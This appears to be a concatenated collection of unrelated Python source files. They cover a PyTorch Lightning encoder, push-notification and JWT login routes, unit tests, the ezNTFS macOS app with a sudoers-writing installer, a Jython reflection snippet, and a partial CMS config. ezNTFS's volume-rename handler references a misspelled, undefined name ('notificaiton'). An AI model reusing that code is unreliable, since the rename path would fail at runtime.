hs = self.map_feature(output["hidden_states"], langs)
hs = self.process_feature(hs)
hs = self.dropout(hs)
hs = self.projector(hs, mask)
return hs
def map_feature(self, hidden_states: List[Tensor], langs):
if self.mapping is None:
return hidden_states
assert len(set(langs)) == 1, "a batch should contain only one language"
lang = langs[0]
lang = constant.LANGUAGE_TO_ISO639.get(lang, lang)
if lang not in self.mapping:
return hidden_states
hs = []
for h, m in zip(hidden_states, self.mapping[lang]):
hs.append(m(h))
return hs
def process_feature(self, hidden_states: List[Tensor]):
if self.hparams.weighted_feature:
hs: Tensor = torch.stack(hidden_states)
weight = F.softmax(self.weight, dim=0).view(-1, 1, 1, 1)
hs = hs * weight
hs = hs.sum(dim=0)
else:
hs = hidden_states[self.hparams.feature_layer]
return hs
def evaluation_step_helper(self, batch, prefix) -> Dict[str, Tensor]:
raise NotImplementedError
def validation_step(self, batch, batch_idx, dataloader_idx=0):
return self.evaluation_step_helper(batch, "val")
def test_step(self, batch, batch_idx, dataloader_idx=0):
return self.evaluation_step_helper(batch, "tst")
def training_epoch_end(self, outputs):
return
def aggregate_outputs(
self, outputs: List[List[Dict[str, Tensor]]], langs: List[str], prefix: str
):
assert prefix in ["val", "tst"]
aver_result = defaultdict(list)
for lang, output in zip(langs, outputs):
for key in output[0]:
mean_val = torch.stack([x[key] for x in output]).mean()
self.log(key, mean_val)
raw_key = key.replace(f"{lang}_", "")
aver_result[raw_key].append(mean_val)
for key, vals in aver_result.items():
self.log(key, torch.stack(vals).mean())
def aggregate_metrics(self, langs: List[str], prefix: str):
aver_metric = defaultdict(list)
for lang in langs:
metric = self.metrics[lang]
for key, val in metric.get_metric().items():
self.log(f"{prefix}_{lang}_{key}", val)
aver_metric[key].append(val)
for key, vals in aver_metric.items():
self.log(f"{prefix}_{key}", torch.stack(vals).mean())
def validation_epoch_end(self, outputs):
if len(self.hparams.val_langs) == 1:
outputs = [outputs]
self.aggregate_outputs(outputs, self.hparams.val_langs, "val")
self.aggregate_metrics(self.hparams.val_langs, "val")
return
def test_epoch_end(self, outputs):
if len(self.hparams.tst_langs) == 1:
outputs = [outputs]
self.aggregate_outputs(outputs, self.hparams.tst_langs, "tst")
self.aggregate_metrics(self.hparams.tst_langs, "tst")
return
def get_warmup_and_total_steps(self):
if self.hparams.max_steps is not None:
max_steps = self.hparams.max_steps
else:
max_steps = self.hparams.max_epochs * self.batch_per_epoch
assert not (
self.hparams.warmup_steps != -1 and self.hparams.warmup_portion != -1
)
if self.hparams.warmup_steps != -1:
assert self.hparams.warmup_steps > 0
warmup_steps = self.hparams.warmup_steps
elif self.hparams.warmup_portion != -1:
assert 0 < self.hparams.warmup_portion < 1
warmup_steps = int(max_steps * self.hparams.warmup_portion)
else:
warmup_steps = 1
return warmup_steps, max_steps
def configure_optimizers(self):
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = []
optimizer_grouped_parameters.append(
{
"params": [
p
for n, p in self.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": self.hparams.weight_decay,
}
)
optimizer_grouped_parameters.append(
{
"params": [
p
for n, p in self.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
}
)
optimizer = torch.optim.AdamW(
optimizer_grouped_parameters,
lr=self.hparams.learning_rate,
betas=(0.9, self.hparams.adam_beta2),
eps=self.hparams.adam_eps,
)
warmup_steps, max_steps = self.get_warmup_and_total_steps()
if self.hparams.schedule == Schedule.invsqroot:
scheduler = util.get_inverse_square_root_schedule_with_warmup(
optimizer, warmup_steps
)
interval = "step"
elif self.hparams.schedule == Schedule.linear:
scheduler = util.get_linear_schedule_with_warmup(
optimizer, warmup_steps, max_steps
)
interval = "step"
elif self.hparams.schedule == Schedule.reduceOnPlateau:
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
optimizer, factor=0.5, patience=0, min_lr=1e-6, mode="min"
)
interval = "epoch"
else:
raise ValueError(self.hparams.schedule)
self.optimizer = optimizer
self.scheduler = scheduler
scheduler_dict = {"scheduler": scheduler, "interval": interval}
if self.hparams.schedule == Schedule.reduceOnPlateau:
scheduler_dict["monitor"] = "val_loss"
return [optimizer], [scheduler_dict]
def _get_signature(self, params: Dict):
def md5_helper(obj):
return hashlib.md5(str(obj).encode()).hexdigest()
signature = dict()
for key, val in params.items():
if key == "tokenizer" and isinstance(val, transformers.PreTrainedTokenizer):
signature[key] = md5_helper(list(val.get_vocab().items()))
else:
signature[key] = str(val)
md5 = md5_helper(list(signature.items()))
return md5, signature
def prepare_datasets(self, split: str) -> List[Dataset]:
raise NotImplementedError
def prepare_datasets_helper(
self,
data_class: Type[Dataset],
langs: List[str],
split: str,
max_len: int,
**kwargs,
):
datasets = []
for lang in langs:
filepath = data_class.get_file(self.hparams.data_dir, lang, split)
if filepath is None:
print(f"skipping {split} language: {lang}")
continue
params = {}
params["task"] = self.hparams.task
params["tokenizer"] = self.tokenizer
params["filepath"] = filepath
params["lang"] = lang
params["split"] = split
params["max_len"] = max_len
if split == Split.train:
params["subset_ratio"] = self.hparams.subset_ratio
params["subset_count"] = self.hparams.subset_count
params["subset_seed"] = self.hparams.subset_seed
params.update(kwargs)
md5, signature = self._get_signature(params)
del params["task"]
cache_file = f"{self.hparams.cache_path}/{md5}"
if self.hparams.cache_dataset and os.path.isfile(cache_file):
print(f"load from cache {filepath} with {self.hparams.pretrain}")
dataset = torch.load(cache_file)
else:
dataset = data_class(**params)
if self.hparams.cache_dataset:
print(f"save to cache {filepath} with {self.hparams.pretrain}")
torch.save(dataset, cache_file)
with open(f"{cache_file}.json", "w") as fp:
json.dump(signature, fp)
datasets.append(dataset)
return datasets
def train_dataloader(self):
if self.trn_datasets is None:
self.trn_datasets = self.prepare_datasets(Split.train)
collate = partial(util.default_collate, padding=self.padding)
if len(self.trn_datasets) == 1:
dataset = self.trn_datasets[0]
sampler = RandomSampler(dataset)
else:
dataset = ConcatDataset(self.trn_datasets)
if self.hparams.mix_sampling:
sampler = RandomSampler(dataset)
else:
sampler = util.ConcatSampler(dataset, self.hparams.batch_size)
return DataLoader(
dataset,
batch_size=self.hparams.batch_size,
sampler=sampler,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
def val_dataloader(self):
if self.val_datasets is None:
self.val_datasets = self.prepare_datasets(Split.dev)
collate = partial(util.default_collate, padding=self.padding)
return [
DataLoader(
val_dataset,
batch_size=self.hparams.eval_batch_size,
shuffle=False,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
for val_dataset in self.val_datasets
]
def test_dataloader(self):
if self.tst_datasets is None:
self.tst_datasets = self.prepare_datasets(Split.test)
collate = partial(util.default_collate, padding=self.padding)
return [
DataLoader(
tst_dataset,
batch_size=self.hparams.eval_batch_size,
shuffle=False,
pin_memory=True,
drop_last=False,
collate_fn=collate,
num_workers=1,
)
for tst_dataset in self.tst_datasets
]
@classmethod
def add_model_specific_args(cls, parent_parser):
parser = ArgumentParser(parents=[parent_parser], add_help=False)
# fmt: off
# shared
parser.add_argument("--task", required=True, choices=Task().choices(), type=str)
parser.add_argument("--data_dir", required=True, type=str)
parser.add_argument("--trn_langs", required=True, nargs="+", type=str)
parser.add_argument("--val_langs", required=True, nargs="+", type=str)
parser.add_argument("--tst_langs", default=[], nargs="*", type=str)
parser.add_argument("--max_trn_len", default=128, type=int)
parser.add_argument("--max_tst_len", default=128, type=int)
parser.add_argument("--subset_ratio", default=1.0, type=float)
parser.add_argument("--subset_count", default=-1, type=int)
parser.add_argument("--subset_seed", default=42, type=int)
parser.add_argument("--mix_sampling", default=False, type=util.str2bool)
# encoder
parser.add_argument("--pretrain", required=True, type=str)
parser.add_argument("--freeze_layer", default=-1, type=int)
parser.add_argument("--feature_layer", default=-1, type=int)
parser.add_argument("--weighted_feature", default=False, type=util.str2bool)
parser.add_argument("--projector", default="id", choices=["id", "meanpool", "transformer"], type=str)
parser.add_argument("--projector_trm_hidden_size", default=3072, type=int)
parser.add_argument("--projector_trm_num_heads", default=12, type=int)
parser.add_argument("--projector_trm_num_layers", default=4, type=int)
parser.add_argument("--projector_dropout", default=0.2, type=float)
parser.add_argument("--input_dropout", default=0.2, type=float)
parser.add_argument("--mapping", default="", type=str)
# misc
parser.add_argument("--seed", default=42, type=int)
parser.add_argument("--learning_rate", default=5e-5, type=float)
parser.add_argument("--adam_beta2", default=0.99, type=float)
parser.add_argument("--adam_eps", default=1e-8, type=float)
parser.add_argument("--weight_decay", default=0.0, type=float)
parser.add_argument("--batch_size", default=32, type=int)
parser.add_argument("--eval_batch_size", default=32, type=int)
parser.add_argument("--schedule", default=Schedule.linear, choices=Schedule().choices(), type=str)
parser.add_argument("--warmup_steps", default=-1, type=int)
parser.add_argument("--warmup_portion", default=-1, type=float)
# fmt: on
return parser
|
157150
|
from app.models.APNDevice import APNDevice
from app.instances import db
from app.instances.redis import redis_db
from app.models.User import User
from os import urandom
from uuid import UUID
from flask import g
pn_redis_id_prefix = 'pn-id:'
pn_redis_id_time = 60 * 2 # In seconds
def is_valid_webapn_version(version):
# Functional on both versions. As of August 2018 the WebAPN is implemented
# with v2 however the whole process was tested with v1. The documentation
# does not mention what the changes are however it appears Axtell works with
# both.
return version in (1, 2)
def add_apn_device(user, provider):
device = APNDevice(provider=provider, user=user)
db.session.add(device)
db.session.commit()
return device
def delete_apn_device(authorization_token, provider):
"""
Deletes a device.
:return: boolean if removed
"""
device = APNDevice.query.filter_by(uuid=authorization_token, provider=provider).first()
if not isinstance(device, APNDevice):
return False
db.session.delete(device)
db.session.commit()
return True
def set_apn_device(authorization_token, provider, device_token):
device = APNDevice.query.filter_by(uuid=authorization_token, provider=provider).first()
if not isinstance(device, APNDevice):
return None
device.device_id = device_token
db.session.commit()
return device
def get_temporary_id_user(authorization_token):
"""
Gets user given a temporary id
"""
redis_key = pn_redis_id_prefix + authorization_token
user_id = redis_db.get(redis_key)
if user_id is None:
return None
redis_db.delete(redis_key)
user = User.query.filter_by(id=user_id).first()
return user
def generate_temporary_id():
"""
For an authorized user. This generates a temporary (5 min lifetime)
that identifies the user. This
"""
webapn_id = str(UUID(bytes=urandom(16)))
redis_key = pn_redis_id_prefix + webapn_id
redis_db.set(redis_key, g.user.id)
redis_db.expire(redis_key, pn_redis_id_time)
return webapn_id
|
157206
|
from quart import jsonify, request
from quart_jwt_extended import (
JWTManager, jwt_required, create_access_token,
get_jwt_identity
)
from __main__ import app
from pkg.common import user
@app.route('/login', methods=['POST'])
async def login():
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
data = await request.get_json()
print(type(data))
username = data['username']
password = data['password']
if not username:
return jsonify({"msg": "Missing username parameter"}), 400
if not password:
return jsonify({"msg": "Missing password parameter"}), 400
valid_user = user.check_user(username,password)
if not valid_user:
return jsonify({"msg": "Bad username or password"}), 401
# Identity can be any data that is json serializable
access_token = create_access_token(identity=username)
return jsonify(access_token=access_token), 200
@app.route('/signup', methods=['POST'])
async def signup():
if not request.is_json:
return jsonify({"msg": "Missing JSON in request"}), 400
data = await request.get_json()
username = data['username']
password = data['password']
if not username:
return jsonify({"msg": "Missing username parameter"}), 400
if not password:
return jsonify({"msg": "Missing password parameter"}), 400
user_added = user.add_user(username,password)
if user_added:
return jsonify({"msg":"User added successfully"}), 200
else:
return jsonify({"msg":"User addition failed"}), 400
@app.route('/user', methods=['GET'])
@jwt_required
async def username():
username = get_jwt_identity()
return jsonify(username=username), 200
|
157207
|
import numpy as np
import pytest
import psyneulink.core.components.functions.nonstateful.selectionfunctions as Functions
import psyneulink.core.globals.keywords as kw
import psyneulink.core.llvm as pnlvm
from psyneulink.core.globals.utilities import _SeededPhilox
np.random.seed(0)
SIZE=10
test_var = np.random.rand(SIZE) * 2.0 - 1.0
# the sum of probs should be 1.0
test_prob = np.random.rand(SIZE)
test_prob /= sum(test_prob)
test_philox = np.random.rand(SIZE)
test_philox /= sum(test_philox)
test_data = [
(Functions.OneHot, test_var, {'mode':kw.MAX_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0.92732552, 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_ABS_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0.92732552, 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 1., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MAX_ABS_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 1., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_VAL}, [0., 0., 0., 0., 0., 0., 0., 0., 0., -0.23311696]),
(Functions.OneHot, test_var, {'mode':kw.MIN_ABS_VAL}, [0., 0., 0., 0.08976637, 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_INDICATOR}, [0., 0., 0., 0., 0., 0., 0., 0., 0., 1.]),
(Functions.OneHot, test_var, {'mode':kw.MIN_ABS_INDICATOR}, [0., 0., 0., 1.,0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_prob], {'mode':kw.PROB}, [0., 0., 0., 0.08976636599379373, 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_prob], {'mode':kw.PROB_INDICATOR}, [0., 0., 0., 1., 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_philox], {'mode':kw.PROB}, [0., 0.43037873274483895, 0., 0., 0., 0., 0., 0., 0., 0.]),
(Functions.OneHot, [test_var, test_philox], {'mode':kw.PROB_INDICATOR}, [0., 1., 0., 0., 0., 0., 0., 0., 0., 0.]),
]
# use list, naming function produces ugly names
names = [
"OneHot MAX_VAL",
"OneHot MAX_ABS_VAL",
"OneHot MAX_INDICATOR",
"OneHot MAX_ABS_INDICATOR",
"OneHot MIN_VAL",
"OneHot MIN_ABS_VAL",
"OneHot MIN_INDICATOR",
"OneHot MIN_ABS_INDICATOR",
"OneHot PROB",
"OneHot PROB_INDICATOR",
"OneHot PROB PHILOX",
"OneHot PROB_INDICATOR PHILOX",
]
GROUP_PREFIX="SelectionFunction "
@pytest.mark.function
@pytest.mark.integrator_function
@pytest.mark.benchmark
@pytest.mark.parametrize("func, variable, params, expected", test_data, ids=names)
def test_basic(func, variable, params, expected, benchmark, func_mode):
benchmark.group = GROUP_PREFIX + func.componentName + params['mode']
f = func(default_variable=variable, **params)
if len(variable) == 2 and variable[1] is test_philox:
f.parameters.random_state.set(_SeededPhilox([0]))
EX = pytest.helpers.get_func_execution(f, func_mode)
EX(variable)
res = EX(variable)
assert np.allclose(res, expected)
if benchmark.enabled:
benchmark(EX, variable)
|
157216
|
from Foundation import *
from AppKit import *
from PyObjCTools import AppHelper
from collections import deque
import contextlib
from enum import Enum
import os
from pathlib import Path
import shutil
import subprocess
import sys
from . import ezntfs
from . import __version__
def create_icon(symbol, description, fallback_image):
# System symbols are only available on macOS 11.0+
return (
NSImage.imageWithSystemSymbolName_accessibilityDescription_(symbol, description)
if hasattr(NSImage, "imageWithSystemSymbolName_accessibilityDescription_")
else NSImage.imageNamed_(fallback_image)
)
DEFAULT_ICON = create_icon("externaldrive.fill", "ezNTFS?", "NSNavEjectButton.normal")
BUSY_ICON = create_icon("externaldrive.fill.badge.minus", "ezNTFS (busy)", "NSNavEjectButton.rollover")
ERROR_ICON = create_icon("externaldrive.fill.badge.xmark", "ezNTFS (error)", "NSStopProgressFreestandingTemplate")
AppState = Enum("AppState", ["READY", "FAILED", "RELOADING", "MOUNTING"])
ALWAYS_SHOW_FLAG = os.getenv('EZNTFS_ALWAYS_SHOW') == "yes"
status_icons = {
AppState.READY: DEFAULT_ICON,
AppState.FAILED: ERROR_ICON,
AppState.RELOADING: BUSY_ICON,
AppState.MOUNTING: BUSY_ICON,
}
class AppDelegate(NSObject):
def applicationDidFinishLaunching_(self, sender):
self.initializeAppState()
self.initializeAppUi()
self.env = self.detectEnvironment()
if not self.state is AppState.FAILED:
self.observeMountChanges()
self.goNext()
def runOnMainThread_with_(self, method, payload):
self.performSelectorOnMainThread_withObject_waitUntilDone_(
method, payload, False
)
def initializeAppState(self):
self.state = AppState.READY
self.failure = None
self.needs_reload = True
self.volumes = []
self.mount_queue = deque()
self.mounting = None
self.last_mount_failed = None
def initializeAppUi(self):
status_bar = NSStatusBar.systemStatusBar()
status_item = status_bar.statusItemWithLength_(NSVariableStatusItemLength)
status_item.setVisible_(False)
button = status_item.button()
button.setTitle_("ezNTFS")
button.setImage_(DEFAULT_ICON)
button.setToolTip_(f"ezNTFS {__version__}")
menu = NSMenu.new()
menu.setAutoenablesItems_(False)
status_item.setMenu_(menu)
self.status_item = status_item
def detectEnvironment(self):
try:
env = ezntfs.get_environment_info()
if env.fuse is None:
self.handleFail_("Failed to detect macFUSE")
elif env.ntfs_3g is None:
self.handleFail_("Failed to detect ntfs-3g")
elif not env.can_mount:
self.handleFail_("Missing privileges to mount via ntfs-3g")
return env
except:
self.handleFail_("Failed to detect the environment")
def observeMountChanges(self):
workspace = NSWorkspace.sharedWorkspace()
notification_center = workspace.notificationCenter()
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidMount:", NSWorkspaceDidMountNotification, None)
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidUnmount:", NSWorkspaceDidUnmountNotification, None)
notification_center.addObserver_selector_name_object_(self, "handleVolumeDidRename:", NSWorkspaceDidRenameVolumeNotification, None)
def handleVolumeDidMount_(self, notification):
if self.state is AppState.FAILED:
return
if self.state is AppState.READY:
path = notification.userInfo()[NSWorkspaceVolumeURLKey].path()
self.needs_reload = path
else:
self.needs_reload = True
self.goNext()
def handleVolumeDidUnmount_(self, notification):
if self.state is AppState.FAILED:
return
url = notification.userInfo()[NSWorkspaceVolumeURLKey]
volume = self.findVolumeWithUrl_(url)
if self.state is AppState.READY:
if volume is not None:
self.removeVolume_(volume)
elif volume is not None and self.isMountingVolume_(volume):
pass
else:
self.needs_reload = True
self.goNext()
def handleVolumeDidRename_(self, notification):
if self.state is AppState.FAILED:
return
old_url = notification.userInfo()[NSWorkspaceVolumeOldURLKey]
old_volume = self.findVolumeWithUrl_(old_url)
if self.state is AppState.READY:
if old_volume is not None:
new_name = notificaiton.userInfo()[NSWorkspaceVolumeLocalizedNameKey]
new_path = notificaiton.userInfo()[NSWorkspaceVolumeURLKey].path()
new_volume = old_volume._replace(name=new_name, mount_path=new_path)
self.addVolume_(new_volume)
else:
self.needs_reload = True
self.goNext()
def goNext(self):
if self.state is not AppState.READY:
pass
elif self.needs_reload:
if isinstance(self.needs_reload, str):
self.goAddVolume_(self.needs_reload)
else:
self.goReloadVolumeList()
self.needs_reload = False
elif len(self.mount_queue) > 0:
volume = self.mount_queue.popleft()
self.goMountVolume_(volume)
self.refreshUi()
def findVolumeWithUrl_(self, url):
path = url.path()
return next((v for v in self.volumes if v.mount_path == path), None)
def fail_(self, message):
self.runOnMainThread_with_(self.handleFail_, message)
def handleFail_(self, message):
self.state = AppState.FAILED
self.failure = message
self.goNext()
def goReloadVolumeList(self):
self.state = AppState.RELOADING
self.performSelectorInBackground_withObject_(self.doReloadVolumeList_, None)
def doReloadVolumeList_(self, nothing):
try:
volumes = ezntfs.get_all_ntfs_volumes().values()
self.runOnMainThread_with_(self.handleReloadVolumeList_, volumes)
except:
self.fail_("Failed to retrieve NTFS volumes")
def handleReloadVolumeList_(self, volumes):
if self.state == AppState.FAILED:
return
self.state = AppState.READY
self.volumes = [v for v in volumes if v.mounted or v.internal or self.isMountingVolume_(v)]
self.volumes.sort(key=lambda v: v.id)
self.goNext()
def goAddVolume_(self, volumeIdOrPath):
self.state = AppState.RELOADING
self.performSelectorInBackground_withObject_(self.doAddVolume_, volumeIdOrPath)
def doAddVolume_(self, volumeIdOrPath):
try:
volume = ezntfs.get_ntfs_volume(volumeIdOrPath)
self.runOnMainThread_with_(self.handleAddVolume_, volume)
except:
self.fail_("Failed to retrieve NTFS volumes")
def handleAddVolume_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
if volume is not None:
self.addVolume_(volume)
self.goNext()
def addVolume_(self, volume):
self.removeVolume_(volume)
self.volumes.append(volume)
self.volumes.sort(key=lambda v: v.id)
def removeVolume_(self, volume):
self.volumes = [v for v in self.volumes if v.id != volume.id]
def refreshUi(self):
self.status_item.button().setImage_(status_icons[self.state])
menu = self.status_item.menu()
menu.removeAllItems()
if self.state is AppState.FAILED:
self.addTextItem_withLabel_(menu, self.failure)
else:
if self.last_mount_failed is not None:
self.addTextItem_withLabel_(menu, f"Failed to mount: {self.last_mount_failed.name}")
menu.addItem_(NSMenuItem.separatorItem())
self.addVolumeItems_(menu)
menu.addItem_(NSMenuItem.separatorItem())
menu.addItemWithTitle_action_keyEquivalent_("Quit", "terminate:", "")
self.status_item.setVisible_(self.state is AppState.FAILED or ALWAYS_SHOW_FLAG or len(self.volumes) > 0)
def addTextItem_withLabel_(self, menu, label):
item = menu.addItemWithTitle_action_keyEquivalent_(label, "", "")
item.setEnabled_(False)
def addVolumeItems_(self, menu):
if len(self.volumes) == 0:
self.addTextItem_withLabel_(menu, "No NTFS volumes found")
for volume in self.volumes:
label = f"{volume.name} [{volume.size}]"
item = menu.addItemWithTitle_action_keyEquivalent_(label, "handleVolumeClicked:", "")
item.setRepresentedObject_(volume)
if self.isMountingVolume_(volume) or self.willMountVolume_(volume):
item.setEnabled_(False)
item.setToolTip_("Mounting...")
elif volume.access is ezntfs.Access.WRITABLE:
item.setState_(NSControlStateValueOn)
item.setEnabled_(False)
item.setToolTip_("Volume is writable")
else:
item.setToolTip_("Click to mount with ntfs-3g")
def isMountingVolume_(self, volume):
return self.mounting is not None and self.mounting.id == volume.id
def willMountVolume_(self, volume):
return volume.id in (v.id for v in self.mount_queue)
def handleVolumeClicked_(self, menu_item):
volume = menu_item.representedObject()
self.mount_queue.append(volume)
self.goNext()
def goMountVolume_(self, volume):
self.state = AppState.MOUNTING
self.mounting = volume
self.performSelectorInBackground_withObject_(self.doMountVolume_, volume)
def doMountVolume_(self, volume):
try:
if volume.access is ezntfs.Access.WRITABLE:
return self.runOnMainThread_with_(self.handleMountVolumeOk_, volume)
if volume.mounted:
ok = ezntfs.macos_unmount(volume)
if not ok:
return self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
ok = ezntfs.mount(volume, version=self.env.ntfs_3g, path=volume.mount_path)
if not ok:
if volume.mounted:
ezntfs.macos_mount(volume)
return self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
self.runOnMainThread_with_(self.handleMountVolumeOk_, volume)
except:
self.runOnMainThread_with_(self.handleMountVolumeFail_, volume)
def handleMountVolumeOk_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
self.addVolume_(volume._replace(access=ezntfs.Access.WRITABLE))
self.mounting = None
self.last_mount_failed = None
self.goNext()
def handleMountVolumeFail_(self, volume):
if self.state is AppState.FAILED:
return
self.state = AppState.READY
self.needs_reload = True
self.mounting = None
self.last_mount_failed = volume
self.goNext()
def main():
if len(sys.argv) <= 1:
return launch_app()
command = sys.argv[1]
if command == "install":
return install()
elif command == "uninstall":
return uninstall()
print(f"Unknown command: {command}")
sys.exit(1)
def launch_app():
app = NSApplication.sharedApplication()
delegate = AppDelegate.new()
app.setDelegate_(delegate)
app.setActivationPolicy_(NSApplicationActivationPolicyProhibited)
AppHelper.runEventLoop()
APP_NAME = "com.lezgomatt.ezntfs"
LAUNCHD_CONFIG_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>{app_name}</string>
<key>EnvironmentVariables</key>
<dict>
<key>NTFS_3G_PATH</key>
<string>{ntfs_3g_path}</string>
</dict>
<key>Program</key>
<string>{app_path}</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>"""
def install():
user = os.getenv("SUDO_USER")
user_id = os.getenv("SUDO_UID")
group_id = os.getenv("SUDO_GID")
if os.geteuid() != 0 or user is None or user_id is None or group_id is None:
print("Need root to configure sudoers, try again with sudo")
return
env = ezntfs.get_environment_info()
if env.fuse is None:
print("Failed to detect macFUSE")
return
if env.ntfs_3g is None:
print("Failed to detect ntfs-3g")
return
app_path = shutil.which("ezntfs-app")
if app_path is None:
print("Could not find ezntfs-app in the path")
return
sudoers_config_path = f"/private/etc/sudoers.d/{APP_NAME.replace('.', '-')}"
with open(sudoers_config_path, "w") as sudoers_config_file:
sudoers_config_file.write(f"%#{group_id}\t\tALL = NOPASSWD: {ezntfs.NTFS_3G_PATH}\n")
launchd_config_path = f"{Path.home()}/Library/LaunchAgents/{APP_NAME}.plist"
with open(launchd_config_path, "w") as launchd_config_file:
launchd_config_file.write(LAUNCHD_CONFIG_TEMPLATE.format(
app_name=APP_NAME,
ntfs_3g_path=ezntfs.NTFS_3G_PATH,
app_path=app_path,
))
os.chown(sudoers_config_path, 0, 0)
os.chmod(sudoers_config_path, 0o640)
os.chown(launchd_config_path, int(user_id), int(group_id))
subprocess.run(["su", "-", user, "-c", f"launchctl unload -F {launchd_config_path}"], capture_output=True)
subprocess.run(["su", "-", user, "-c", f"launchctl load -F {launchd_config_path}"], capture_output=True)
print("Installation complete! Try plugging an NTFS drive in.")
print("NOTE: You may need to grant python access to removable volumes.")
def uninstall():
if os.geteuid() != 0:
print("Need root to remove sudoers config, try again with sudo")
return
with contextlib.suppress(FileNotFoundError):
os.remove(f"/private/etc/sudoers.d/{APP_NAME.replace('.', '-')}")
with contextlib.suppress(FileNotFoundError):
os.remove(f"{Path.home()}/Library/LaunchAgents/{APP_NAME}.plist")
print("Uninstallation complete!")
|
157254
|
from data_vault import clean_line
from data_vault.parsing import unquote, bool_or_str
def test_clean_line():
pieces = clean_line('from module import a, b, c')
assert pieces == ['from', 'module', 'import', 'a,b,c']
# commas
pieces = clean_line('from "a/path/with/c,o,m,m,a,s" import a, b, c')
assert pieces == ['from', '"a/path/with/c,o,m,m,a,s"', 'import', 'a,b,c']
pieces = clean_line("from 'a/path/with/c,o,m,m,a,s' import a, b, c")
assert pieces == ['from', "'a/path/with/c,o,m,m,a,s'", 'import', 'a,b,c']
# escaped paths
pieces = clean_line(r"from 'an/escaped\'path/' import a, b, c")
assert pieces == ['from', r"'an/escaped\'path/'", 'import', 'a,b,c']
# comments
pieces = clean_line('from module import a, b#, c')
assert pieces == ['from', 'module', 'import', 'a,b']
def test_unquote():
assert unquote("'an/escaped\'path/'") == 'an/escaped\'path/'
assert unquote('"an/escaped\"path/"') == 'an/escaped\"path/'
def test_bool_or_str():
assert bool_or_str('a') == 'a'
assert bool_or_str('True') is True
assert bool_or_str('False') is False
assert bool_or_str('true') == 'true'
|
157255
|
import Confidential
message = Confidential('top secret text')
secret_field = Confidential.getDeclaredField('secret')
secret_field.setAccessible(True) # break the lock!
print 'message.secret =', secret_field.get(message)
|
157265
|
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
from PhysicsTools.PatAlgos.tools.helpers import getPatAlgosToolsTask
import sys
process = cms.Process("Analyzer")
patAlgosToolsTask = getPatAlgosToolsTask(process)
## defining command line options
options = VarParsing.VarParsing ('standard')
options.register('runOnAOD', True, VarParsing.VarParsing.multiplicity.singleton, VarParsing.VarParsing.varType.bool, "run on AOD")
## processing provided options
if( hasattr(sys, "argv") ):
for args in sys.argv :
arg = args.split(',')
for val in arg:
val = val.split('=')
if(len(val)==2):
setattr(options,val[0], val[1])
## enabling unscheduled mode for modules
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(False)
)
## configure message logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.threshold = 'INFO'
process.MessageLogger.cerr.FwkReport.reportEvery = 100
## define input
if options.runOnAOD:
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
## add your favourite AOD files here (1000+ events in each file defined below)
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/02203C96-2108-E511-B5C1-00266CFCC214.root',
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/02332898-9808-E511-81E8-3417EBE34BFD.root',
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/060177B4-2E08-E511-83AD-3417EBE644DA.root',
## other AOD samples
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/00199A75-540F-E511-8277-0002C92DB464.root',
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/001B27B8-550F-E511-85CF-0025905A609A.root',
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/007E116A-510F-E511-8D40-F04DA275C007.root',
),
skipEvents = cms.untracked.uint32(0)
)
else:
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
# add your favourite miniAOD files here (1000+ events in each file defined below)
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/141B9915-1F08-E511-B9FF-001E675A6AB3.root',
